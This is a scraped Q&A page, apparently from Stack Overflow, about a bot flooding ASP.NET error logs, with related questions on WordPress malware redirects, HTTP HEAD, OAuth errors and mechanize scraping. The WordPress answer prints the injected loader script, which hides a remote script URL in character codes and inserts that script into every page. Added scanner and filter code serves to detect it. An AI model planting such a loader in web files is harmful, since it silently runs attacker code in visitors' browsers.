Hackers are trying to do something on one of our sites [closed] - asp.net

Closed. This question is off-topic. It is not currently accepting answers.
Closed 11 years ago.
One of our sites recently received a lot of attacks, which all seem similar. By chance, we have an error logging framework which sends us an error log email when something strange happens or an error is raised on the server.
Here is what happens:
Error : The file '/(A(u76U7llazAEkAAAAZTJmYmE1NmMtZTE4YS00YzQ2LTlmYzItNGIxMzZjMzNjOTc4vkp-I-8cYbLrHx25-IfNdMvuKao1))/MostOfOurPublicPage.aspx' does not exist.
Request:
URL: http://Ourwebsite.com/(A(u76U7llazAEkAAAAZTJmYmE1NmMtZTE4YS00YzQ2LTlmYzItNGIxMzZjMzNjOTc4vkp-I-8cYbLrHx25-IfNdMvuKao1))/MostOfOurPublicPage.aspx
User Agent: Mozilla/5.0 (compatible; SiteBot/0.1; +http://www.sitebot.org/robot/)
Referrer:
Host: 213.186.122.2 (Ukraine)
SecuredConnection: False
The User-Agent shows SiteBot/0.1 but I'm pretty sure it's not ... at least I never heard anything about sitebots doing things like that.
Question
So, does anyone have any idea what the heck that is, and what I can do to prevent these things? It makes our error logging framework send us something like 100 error logs a day!
Note: I usually speak French, so sorry for my English.

This is just a search bot or crawler. Place a robots.txt file on your web server root (http://www.example.com/robots.txt) and put the text below in it.
user-agent: sitebot
disallow: /
That should keep it away.
Also, the strange URL it uses is just a session cookie passed in the URL string instead of in a cookie.

These types of issues seem to crop up from time to time. You probably don't want to fully suppress these types of errors as they can be helpful from time to time to determine bad links. What I have done in the past is filter out bot traffic.
Either block the traffic at your firewall, or filter the bot traffic.
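One way to do the filtering suggested above without silencing real broken links, as an added example that is not code from the question or the answers: it strips ASP.NET cookieless ticket segments of the form `/(X(...))/` from the path and sorts each "file does not exist" report into suppress, digest or alert. The `KNOWN_PAGES` set, the verdict names, the placeholder host and the sample reports are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Cookieless tickets sit in the path as /(A(...))/, /(S(...))/ or /(F(...))/;
# several can share one pair of outer parentheses.
COOKIELESS = re.compile(r"/\((?:[A-Z]\([^()/]*\))+\)(?=/)")
# Heuristic for self-declared crawlers such as "SiteBot/0.1; +http://..."
DECLARED_BOT = re.compile(r"(?:bot|crawler|spider)\b", re.I)

def strip_ticket(url):
    """Return (path without the cookieless segment, True if one was removed)."""
    path, count = COOKIELESS.subn("", urlsplit(url).path)
    return path, count > 0

def triage(entry, known_pages):
    """Classify one 'file does not exist' report as suppress, digest or alert."""
    path, had_ticket = strip_ticket(entry["url"])
    if had_ticket and path.lower() in known_pages:
        return "suppress"   # existing page requested with a ticket prefix
    if DECLARED_BOT.search(entry["user_agent"]):
        return "digest"     # crawler noise: batch into one daily summary
    return "alert"          # unexplained missing file, still worth an e-mail

def summarize(entries, known_pages):
    """Count verdicts so the daily digest shows how much was filtered."""
    return Counter(triage(e, known_pages) for e in entries)

# Constructed sample reports modelled on the e-mail in the question.
KNOWN_PAGES = {"/mostofourpublicpage.aspx"}
BOT_UA = "Mozilla/5.0 (compatible; SiteBot/0.1; +http://www.sitebot.org/robot/)"
SAMPLE = [
    {"url": "http://ourwebsite.example/(A(CONSTRUCTED-TOKEN))/MostOfOurPublicPage.aspx",
     "user_agent": BOT_UA},
    {"url": "http://ourwebsite.example/old-link.aspx", "user_agent": BOT_UA},
    {"url": "http://ourwebsite.example/missing.aspx",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
]

if __name__ == "__main__":
    for verdict, n in summarize(SAMPLE, KNOWN_PAGES).items():
        print(verdict, n)
```

Only the "alert" verdict would trigger an immediate e-mail; the other two are counted so the volume stays visible in a summary.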

Related

WordPress Malware - Redirect to (fast.destinyfernandi.com) - even after scan and clean [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 2 years ago.
I'm living my worst nightmare. I have a CentOS server that is hosting tens of WordPress websites.
My clients noticed that their websites open and, after loading, are redirected to (fast.destinyfernandi.com) <---- malware website.
I used ClamAV to detect the malware and clean them manually, without any success.
Here is an example of the clamscan result for one of the websites:
----------- SCAN SUMMARY -----------
Known viruses: 6938202
Engine version: 0.101.5
Scanned directories: 2300
Scanned files: 91116
Infected files: 0
Data scanned: 4588.75 MB
Data read: 24121.63 MB (ratio 0.19:1)
Time: 1705.569 sec (28 m 25 s)
But this site is still redirecting to that malware website.
Has anyone come across such an issue?
Please help.
==================================Solved:=============================
The code was injected into all JS files:
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,116,111,109,46,118,101,114,121,98,101,97,116,105,102,117,108,97,110,116,111,110,121,46,99,111,109,47,97,46,106,115); s.src=pl;
if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head')[0].appendChild(s);
}
There are several ways your web resource could be redirected to destinyfernandi:
The database could be patched and your own legitimate code does the redirect.
Some injected code in PHP, JS or HTML templates does the redirect, either via window.location, a meta tag or response headers.
First, discover what address you get redirected to, whether it is destinyfernandi or some other URL.
I mean you could be redirected to some "invisible" URL1, and the server serving URL1 would redirect the browser further to destinyfernandi.
Once you discover the first hop (URL) in the redirects, you can search for the bad URL in the source code and a database dump.
There is also a chance that the first hop URL (most likely destinyfernandi) is obfuscated in your code, but let's hope that is not the case.
You can also add a breakpoint which fires on redirects, which could help you identify an obfuscated piece of JS code:
window.addEventListener("beforeunload", function() { debugger; }, false)
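The signature scan in the question reported zero infected files while the loader sat in the JS files with its URL spelled out as character codes, so a plain search for the bad URL would miss it. The following added example (not code from the question or the answer) walks a site tree, decodes every `String.fromCharCode(...)` argument list and reports files where the result is a URL; the function names, the allow list and the placeholder host `loader.example.invalid` are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Numeric argument list of a String.fromCharCode(...) call, as in the injected snippet.
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")

def decode_char_codes(js_source):
    """Return the strings spelled out by String.fromCharCode(n, n, ...) calls."""
    decoded = []
    for match in FROM_CHAR_CODE.finditer(js_source):
        codes = [int(n) & 0xFFFF for n in match.group(1).split(",")]  # JS keeps 16 bits
        decoded.append("".join(chr(c) for c in codes))
    return decoded

def hidden_urls(js_source, allowed_hosts=frozenset()):
    """Decoded strings that are URLs whose host is not on the allow list."""
    return [s for s in decode_char_codes(js_source)
            if re.match(r"(?:https?:)?//", s)
            and urlsplit(s).hostname not in allowed_hosts]

def scan_tree(root, allowed_hosts=frozenset()):
    """Map each .js file under root (relative path) to the hidden URLs in it."""
    findings = {}
    for path in sorted(Path(root).rglob("*.js")):
        urls = hidden_urls(path.read_text(errors="replace"), allowed_hosts)
        if urls:
            findings[str(path.relative_to(root))] = urls
    return findings

def constructed_sample(url):
    """Build a test fixture line in the same style as the injected one."""
    codes = ",".join(str(ord(c)) for c in url)
    return "var pl = String.fromCharCode(%s); s.src=pl;" % codes

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        # Constructed files: one clean, one with an encoded placeholder URL appended.
        Path(root, "clean.js").write_text("console.log('ok');\n")
        Path(root, "theme.js").write_text(
            "jQuery(function(){});\n"
            + constructed_sample("https://loader.example.invalid/a.js"))
        for name, urls in scan_tree(root).items():
            print(name, urls)
```

Every file it lists needs the appended loader removed or a restore from a known-good copy, and the list doubles as a record of which files changed.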

Why I have an error performing password flow when I login? [closed]

Closed. This question needs debugging details. It is not currently accepting answers.
Closed 2 years ago.
When trying to login my browser generates an error saying "An error has occurred" and if I inspect it shows something like this:
How can I resolve this?
It seems like your token endpoint is configured to use a different authentication method. There is an error shown, invalid_client; it looks like you're using the password flow to authenticate but your token endpoint expects another grant type.
That 400 error means that the server was unable to process the request sent by your application due to invalid syntax. Perhaps something invalid with your authentication token sent. Very hard to tell with so little information.

Why would a server disallow HTTP HEAD? [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 12 months ago.
I found out that there are servers that respond with HTTP 405 to HEAD requests (or another status code including 404 which is confusing IMO, but that's not important now) even though GET requests are responded with HTTP 200. HTTP 405 is defined as...
405 Method Not Allowed
The method specified in the Request-Line is not allowed for the
resource identified by the Request-URI. The response MUST include an
Allow header containing a list of valid methods for the requested
resource.
Alright, I looked at the Allow header and found out that I can use GET to get the resource (even though I only wanted to find out whether the resource exists). Problem solved.
However, my question is... Why would a server disallow the HEAD method? What is the advantage? Are there possible security reasons?
I think it is because they're getting a log full of "the requested resource can only be accessed via SSL" errors when their HTTPS-only site gets tons of HEAD requests via HTTP. I think they're conflating "method" with "protocol" and so thinking the 405 makes sense.
See this post for an example of someone asking about the issue and being told to give a 405.

Send XML file via HTTP POST redirect to another server [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
Questions asking for code must demonstrate a minimal understanding of the problem being solved. Include attempted solutions, why they didn't work, and the expected results. See also: Stack Overflow question checklist
Closed 9 years ago.
After receiving a post request in servlet, I have to do a redirection to another server and at the same time I have to pass an xml file in the redirection request.
For example, I have to do a redirection from my servlet to "http://www.abc.com" and pass an xml file in the request.
I tried the following, but it didn't work.
response.sendRedirect - it creates only GET requests, so I am not able to send the XML
HttpClient or URLConnection - it creates a new request and does not do the actual redirection
Intermediate JSP - I forwarded the request to an intermediate JSP and did a submit from the JSP. It sends the XML in a parameter and not in the InputStream
Please let me know how to achieve this.
A redirect (either HTTP or HTML) can only operate on a URL, rather than a form submission, which offers built in support for uploading files via the "multipart/form-data" form encoding, and so you would have to encode your file within the URL itself, which would severely limit you given that the lowest-common-denominator (Internet Explorer) URL maximum length is around 2000 characters. If your files are smaller than that, then you could encode your file as a URL query parameter. Otherwise, it's probably not possible, but I will stand corrected if others know of a way to achieve it.

Why does the website know I am using a bot to check my IP [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 8 years ago.
I use mechanize to create a virtual browser
import cookielib  # Python 2 standard library (http.cookiejar in Python 3)
import mechanize

br = mechanize.Browser()
# set cookies
cookies = cookielib.LWPCookieJar()
br.set_cookiejar(cookies)
# browser settings (used to emulate a browser)
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_responses(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
br.open("http://www.whatsmyip.org/")
Although the website returns my IP, they give a notice:
Please DO NOT program a bot to use this site to grab your IPs. It kills my server and thats not nice. Just get some cheap or free web hosting and make your own IP-only page to power your bot. Then you won't even have to parse any html, just load the IP directly - better for everyone!!
Why does the website know that?
Am I missing something in my code?
I tested your code, it all works fine.
Do you mean this part:
<!--
Please DO NOT program a bot to use this site to grab your IPs. It kills my server and thats not nice.
Just get some cheap or free web hosting and make your own IP-only page to power your bot.
Then you won't even have to parse any html, just load the IP directly - better for everyone!!
-->
If yes, then it's just a comment tag that is used to remind users not to use the website with bots.
It doesn't "catch" you or anything. If you go to the whatsmyip page and open the source code, you will see that it starts on line 24 (even if you open it in the browser).
So all in all it's just a warning that the web developers put inside the HTML.
